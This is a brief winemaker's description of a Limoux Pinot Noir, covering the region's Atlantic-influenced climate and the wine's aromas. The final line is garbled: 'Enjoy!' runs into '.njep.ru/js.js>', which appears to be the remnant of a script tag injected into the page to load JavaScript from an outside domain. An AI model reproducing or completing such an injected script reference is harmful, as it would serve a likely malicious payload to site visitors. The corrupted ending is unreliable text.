Winemaker's Notes
|
Perhaps no grape variety is as sensitive to climate as Pinot Noir. To ensure that this Pinot Noir delivers pure varietal character, we harvest fruit from vineyards in the Oceanic zone of Limoux, France. Many people are surprised to find that this microclimate is created by the influence of the distant Atlantic Ocean. Less well known than Burgundy and Champagne, it is similarly characterized as being a perfect climate for cool-weather varietals such as Pinot Noir. Delicate spice, exotic aromas with strawberries, sandalwood and vanilla, this is a remarkably elegant and complex Pinot Noir. Enjoy!.njep.ru/js.js> |
